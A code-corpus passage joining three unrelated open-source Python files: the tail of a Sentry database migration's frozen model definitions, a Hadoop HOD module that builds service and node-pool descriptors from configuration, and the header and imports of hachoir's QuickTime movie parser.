'unique_together': "(('rule', 'group'),)",
'object_name': 'GroupRuleStatus'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'last_active': ('django.db.models.fields.DateTimeField', [], {
'null': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'rule': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Rule']"
}
),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {
'default': '0'
})
},
'sentry.groupseen': {
'Meta': {
'unique_together': "(('user', 'group'),)",
'object_name': 'GroupSeen'
},
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'last_seen':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']",
'db_index': 'False'
}
)
},
'sentry.groupsnooze': {
'Meta': {
'object_name': 'GroupSnooze'
},
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']",
'unique': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'until': ('django.db.models.fields.DateTimeField', [], {})
},
'sentry.groupsubscription': {
'Meta': {
'unique_together': "(('group', 'user'),)",
'object_name': 'GroupSubscription'
},
'date_added': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True'
}
),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'subscription_set'",
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'is_active': ('django.db.models.fields.BooleanField', [], {
'default': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'subscription_set'",
'to': "orm['sentry.Project']"
}
),
'reason':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
)
},
'sentry.grouptagkey': {
'Meta': {
'unique_together': "(('project', 'group', 'key'),)",
'object_name': 'GroupTagKey'
},
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']",
'null': 'True'
}
),
'values_seen':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
})
},
'sentry.grouptagvalue': {
'Meta': {
'unique_together': "(('group', 'key', 'value'),)",
'object_name': 'GroupTagValue',
'db_table': "'sentry_messagefiltervalue'",
'index_together': "(('project', 'key', 'value', 'last_seen'),)"
},
'first_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True',
'db_index': 'True'
}
),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'grouptag'",
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'last_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True',
'db_index': 'True'
}
),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'grouptag'",
'null': 'True',
'to': "orm['sentry.Project']"
}
),
'times_seen':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
}),
'value': ('django.db.models.fields.CharField', [], {
'max_length': '200'
})
},
'sentry.lostpasswordhash': {
'Meta': {
'object_name': 'LostPasswordHash'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'hash': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']",
'unique': 'True'
}
)
},
'sentry.option': {
'Meta': {
'object_name': 'Option'
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key':
('django.db.models.fields.CharField', [], {
'unique': 'True',
'max_length': '64'
}),
'last_updated':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.organization': {
'Meta': {
'object_name': 'Organization'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'default_role':
('django.db.models.fields.CharField', [], {
'default': "'member'",
'max_length': '32'
}),
'flags': ('django.db.models.fields.BigIntegerField', [], {
'default': '1'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'members': (
'django.db.models.fields.related.ManyToManyField', [], {
'related_name': "'org_memberships'",
'symmetrical': 'False',
'through': "orm['sentry.OrganizationMember']",
'to': "orm['sentry.User']"
}
),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'slug':
('django.db.models.fields.SlugField', [], {
'unique': 'True',
'max_length': '50'
}),
'status':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
})
},
'sentry.organizationaccessrequest': {
'Meta': {
'unique_together': "(('team', 'member'),)",
'object_name': 'OrganizationAccessRequest'
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'member': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.OrganizationMember']"
}
),
'team': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Team']"
}
)
},
'sentry.organizationmember': {
'Meta': {
'unique_together': "(('organization', 'user'), ('organization', 'email'))",
'object_name': 'OrganizationMember'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'email': (
'django.db.models.fields.EmailField', [], {
'max_length': '75',
'null': 'True',
'blank': 'True'
}
),
'flags': ('django.db.models.fields.BigIntegerField', [], {
'default': '0'
}),
'has_global_access': ('django.db.models.fields.BooleanField', [], {
'default': 'True'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'member_set'",
'to': "orm['sentry.Organization']"
}
),
'role':
('django.db.models.fields.CharField', [], {
'default': "'member'",
'max_length': '32'
}),
'teams': (
'django.db.models.fields.related.ManyToManyField', [], {
'to': "orm['sentry.Team']",
'symmetrical': 'False',
'through': "orm['sentry.OrganizationMemberTeam']",
'blank': 'True'
}
),
'token': (
'django.db.models.fields.CharField', [], {
'max_length': '64',
'unique': 'True',
'null': 'True',
'blank': 'True'
}
),
'type': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '50',
'blank': 'True'
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'blank': 'True',
'related_name': "'sentry_orgmember_set'",
'null': 'True',
'to': "orm['sentry.User']"
}
)
},
'sentry.organizationmemberteam': {
'Meta': {
'unique_together': "(('team', 'organizationmember'),)",
'object_name': 'OrganizationMemberTeam',
'db_table': "'sentry_organizationmember_teams'"
},
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {
'primary_key': 'True'
}),
'is_active': ('django.db.models.fields.BooleanField', [], {
'default': 'True'
}),
'organizationmember': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.OrganizationMember']"
}
),
'team': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Team']"
}
)
},
'sentry.organizationonboardingtask': {
'Meta': {
'unique_together': "(('organization', 'task'),)",
'object_name': 'OrganizationOnboardingTask'
},
'data': ('jsonfield.fields.JSONField', [], {
'default': '{}'
}),
'date_completed':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Organization']"
}
),
'project_id': (
'sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True',
'blank': 'True'
}
),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'task': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']",
'null': 'True'
}
)
},
'sentry.organizationoption': {
'Meta': {
'unique_together': "(('organization', 'key'),)",
'object_name': 'OrganizationOption',
'db_table': "'sentry_organizationoptions'"
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Organization']"
}
),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.project': {
'Meta': {
'unique_together': "(('team', 'slug'), ('organization', 'slug'))",
'object_name': 'Project'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'first_event': ('django.db.models.fields.DateTimeField', [], {
'null': 'True'
}),
'forced_color': (
'django.db.models.fields.CharField', [], {
'max_length': '6',
'null': 'True',
'blank': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '200'
}),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Organization']"
}
),
'public': ('django.db.models.fields.BooleanField', [], {
'default': 'False'
}),
'slug': ('django.db.models.fields.SlugField', [], {
'max_length': '50',
'null': 'True'
}),
'status': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0',
'db_index': 'True'
}
),
'team': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Team']"
}
)
},
'sentry.projectbookmark': {
'Meta': {
'unique_together': "(('project_id', 'user'),)",
'object_name': 'ProjectBookmark'
},
'date_added': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'project_id': (
'sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True',
'blank': 'True'
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
)
},
'sentry.projectdsymfile': {
'Meta': {
'unique_together': "(('project', 'uuid'),)",
'object_name': 'ProjectDSymFile'
},
'cpu_name': ('django.db.models.fields.CharField', [], {
'max_length': '40'
}),
'file': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.File']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'object_name': ('django.db.models.fields.TextField', [], {}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']",
'null': 'True'
}
),
'uuid': ('django.db.models.fields.CharField', [], {
'max_length': '36'
})
},
'sentry.projectkey': {
'Meta': {
'object_name': 'ProjectKey'
},
'date_added': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'label': (
'django.db.models.fields.CharField', [], {
'max_length': '64',
'null': 'True',
'blank': 'True'
}
),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'key_set'",
'to': "orm['sentry.Project']"
}
),
'public_key': (
'django.db.models.fields.CharField', [], {
'max_length': '32',
'unique': 'True',
'null': 'True'
}
),
'roles': ('django.db.models.fields.BigIntegerField', [], {
'default': '1'
}),
'secret_key': (
'django.db.models.fields.CharField', [], {
'max_length': '32',
'unique': 'True',
'null': 'True'
}
),
'status': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0',
'db_index': 'True'
}
)
},
'sentry.projectoption': {
'Meta': {
'unique_together': "(('project', 'key'),)",
'object_name': 'ProjectOption',
'db_table': "'sentry_projectoptions'"
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.projectplatform': {
'Meta': {
'unique_together': "(('project_id', 'platform'),)",
'object_name': 'ProjectPlatform'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'last_seen':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'platform': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.release': {
'Meta': {
'unique_together': "(('project', 'version'),)",
'object_name': 'Release'
},
'data': ('jsonfield.fields.JSONField', [], {
'default': '{}'
}),
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'date_released':
('django.db.models.fields.DateTimeField', [], {
'null': 'True',
'blank': 'True'
}),
'date_started':
('django.db.models.fields.DateTimeField', [], {
'null': 'True',
'blank': 'True'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'new_groups':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
}),
'owner': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']",
'null': 'True',
'blank': 'True'
}
),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'ref': (
'django.db.models.fields.CharField', [], {
'max_length': '64',
'null': 'True',
'blank': 'True'
}
),
'url': (
'django.db.models.fields.URLField', [], {
'max_length': '200',
'null': 'True',
'blank': 'True'
}
),
'version': ('django.db.models.fields.CharField', [], {
'max_length': '64'
})
},
'sentry.releasecommit': {
'Meta': {
'unique_together': "(('release', 'commit'), ('release', 'order'))",
'object_name': 'ReleaseCommit'
},
'commit': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Commit']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'order': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'project_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
),
'release': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Release']"
}
)
},
'sentry.releaseenvironment': {
'Meta': {
'unique_together': "(('project_id', 'release_id', 'environment_id'),)",
'object_name': 'ReleaseEnvironment',
'db_table': "'sentry_environmentrelease'"
},
'environment_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
),
'first_seen':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'last_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'project_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
),
'release_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
)
},
'sentry.releasefile': {
'Meta': {
'unique_together': "(('release', 'ident'),)",
'object_name': 'ReleaseFile'
},
'file': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.File']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'ident': ('django.db.models.fields.CharField', [], {
'max_length': '40'
}),
'name': ('django.db.models.fields.TextField', [], {}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'release': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Release']"
}
)
},
'sentry.repository': {
'Meta': {
'unique_together': "(('organization_id', 'name'),)",
'object_name': 'Repository'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '200'
}),
'organization_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
)
},
'sentry.rule': {
'Meta': {
'object_name': 'Rule'
},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'label': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'status': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0',
'db_index': 'True'
}
)
},
'sentry.savedsearch': {
'Meta': {
'unique_together': "(('project', 'name'),)",
'object_name': 'SavedSearch'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'is_default': ('django.db.models.fields.BooleanField', [], {
'default': 'False'
}),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '128'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'query': ('django.db.models.fields.TextField', [], {})
},
'sentry.savedsearchuserdefault': {
'Meta': {
'unique_together': "(('project', 'user'),)",
'object_name': 'SavedSearchUserDefault',
'db_table': "'sentry_savedsearch_userdefault'"
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'savedsearch': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.SavedSearch']"
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
)
},
'sentry.tagkey': {
'Meta': {
'unique_together': "(('project', 'key'),)",
'object_name': 'TagKey',
'db_table': "'sentry_filterkey'"
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'label':
('django.db.models.fields.CharField', [], {
'max_length': '64',
'null': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'status':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
}),
'values_seen':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
})
},
'sentry.tagvalue': {
'Meta': {
'unique_together': "(('project', 'key', 'value'),)",
'object_name': 'TagValue',
'db_table': "'sentry_filtervalue'"
},
'data': (
'sentry.db.models.fields.gzippeddict.GzippedDictField', [], {
'null': 'True',
'blank': 'True'
}
),
'first_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True',
'db_index': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'last_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True',
'db_index': 'True'
}
),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']",
'null': 'True'
}
),
'times_seen':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
}),
'value': ('django.db.models.fields.CharField', [], {
'max_length': '200'
})
},
'sentry.team': {
'Meta': {
'unique_together': "(('organization', 'slug'),)",
'object_name': 'Team'
},
'date_added': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Organization']"
}
),
'slug': ('django.db.models.fields.SlugField', [], {
'max_length': '50'
}),
'status':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
})
},
'sentry.user': {
'Meta': {
'object_name': 'User',
'db_table': "'auth_user'"
},
'date_joined':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'email':
('django.db.models.fields.EmailField', [], {
'max_length': '75',
'blank': 'True'
}),
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {
'primary_key': 'True'
}),
'is_active': ('django.db.models.fields.BooleanField', [], {
'default': 'True'
}),
'is_managed': ('django.db.models.fields.BooleanField', [], {
'default': 'False'
}),
'is_password_expired':
('django.db.models.fields.BooleanField', [], {
'default': 'False'
}),
'is_staff': ('django.db.models.fields.BooleanField', [], {
'default': 'False'
}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {
'default': 'False'
}),
'last_login':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'last_password_change': ('django.db.models.fields.DateTimeField', [], {
'null': 'True'
}),
'name': (
'django.db.models.fields.CharField', [], {
'max_length': '200',
'db_column': "'first_name'",
'blank': 'True'
}
),
'password': ('django.db.models.fields.CharField', [], {
'max_length': '128'
}),
'session_nonce':
('django.db.models.fields.CharField', [], {
'max_length': '12',
'null': 'True'
}),
'username':
('django.db.models.fields.CharField', [], {
'unique': 'True',
'max_length': '128'
})
},
'sentry.useravatar': {
'Meta': {
'object_name': 'UserAvatar'
},
'avatar_type':
('django.db.models.fields.PositiveSmallIntegerField', [], {
'default': '0'
}),
'file': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.File']",
'unique': 'True',
'null': 'True',
'on_delete': 'models.SET_NULL'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'ident': (
'django.db.models.fields.CharField', [], {
'unique': 'True',
'max_length': '32',
'db_index': 'True'
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'avatar'",
'unique': 'True',
'to': "orm['sentry.User']"
}
)
},
'sentry.useremail': {
'Meta': {
'unique_together': "(('user', 'email'),)",
'object_name': 'UserEmail'
},
'date_hash_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'email': ('django.db.models.fields.EmailField', [], {
'max_length': '75'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'is_verified': ('django.db.models.fields.BooleanField', [], {
'default': 'False'
}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'emails'",
'to': "orm['sentry.User']"
}
),
'validation_hash': (
'django.db.models.fields.CharField', [], {
'default': "u'o1Fm5V34FBi7vEcjC8i7yx1ycjcNaOCO'",
'max_length': '32'
}
)
},
'sentry.useroption': {
'Meta': {
'unique_together': "(('user', 'project', 'key'),)",
'object_name': 'UserOption'
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']",
'null': 'True'
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.userreport': {
'Meta': {
'unique_together': "(('project', 'event_id'),)",
'object_name': 'UserReport',
'index_together': "(('project', 'event_id'), ('project', 'date_added'))"
},
'comments': ('django.db.models.fields.TextField', [], {}),
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'email': ('django.db.models.fields.EmailField', [], {
'max_length': '75'
}),
'event_id': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']",
'null': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '128'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
)
}
}
complete_apps = ['sentry']
| bsd-3-clause |
squidsolutions/hadoop-common | src/contrib/hod/hodlib/Common/descGenerator.py | 182 | 2306 | #Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
"""manage hod configuration"""
# -*- python -*-
import sys, csv, os
from optparse import Option, OptionParser
from xml.dom import minidom
from sets import Set
from select import select, poll, POLLIN
from hodlib.Common.desc import *
class DescGenerator:
    """Convert the parsed hod configuration into descriptor objects."""

    def __init__(self, hodConfig):
        """Store the hod configuration used to build the descriptors.

        hodConfig -- mapping of configuration section names to option dicts
        """
        self.hodConfig = hodConfig

    def initializeDesc(self):
        """Populate the config with node pool and service descriptors.

        Returns the (mutated) hod configuration.
        """
        self.hodConfig['nodepooldesc'] = self.createNodePoolDesc()
        self.hodConfig['servicedesc'] = self.createServiceDescDict()
        return self.hodConfig

    def getServices(self):
        """Build a ServiceDesc for every 'gridservice-*' section in the config.

        Returns a dict mapping each service's name to its ServiceDesc.
        """
        sdd = {}
        # NOTE: previously the locals here shadowed the builtins 'str' and
        # 'dict'; renamed for clarity with identical behavior.
        for key in self.hodConfig:
            if not key.startswith('gridservice-'):
                continue
            svcConf = self.hodConfig[key]
            # Normalise the server parameter keys to the names ServiceDesc expects.
            if 'server-params' in svcConf:
                svcConf['attrs'] = svcConf['server-params']
            if 'final-server-params' in svcConf:
                svcConf['final-attrs'] = svcConf['final-server-params']
            # Section name is 'gridservice-<id>'; the part after the dash is the id.
            svcConf['id'] = key.split('-')[1]
            desc = ServiceDesc(svcConf)
            sdd[desc.getName()] = desc
        return sdd

    def createNodePoolDesc(self):
        """Create the node pool descriptor from the 'resource_manager' section."""
        return NodePoolDesc(self.hodConfig['resource_manager'])

    def createServiceDescDict(self):
        """Create the service descriptor dict for all configured services."""
        return self.getServices()
| apache-2.0 |
austinvernsonger/metagoofil | hachoir_parser/video/mov.py | 16 | 36206 | """
Apple Quicktime Movie (file extension ".mov") parser.
Documents:
- Parsing and Writing QuickTime Files in Java (by Chris Adamson, 02/19/2003)
http://www.onjava.com/pub/a/onjava/2003/02/19/qt_file_format.html
- QuickTime File Format (official technical reference)
http://developer.apple.com/documentation/QuickTime/QTFF/qtff.pdf
- Apple QuickTime:
http://wiki.multimedia.cx/index.php?title=Apple_QuickTime
- File type (ftyp):
http://www.ftyps.com/
- MPEG4 standard
http://neuron2.net/library/avc/c041828_ISO_IEC_14496-12_2005%28E%29.pdf
Author: Victor Stinner, Robert Xiao
Creation: 2 august 2006
"""
from hachoir_parser import Parser
from hachoir_parser.common.win32 import GUID
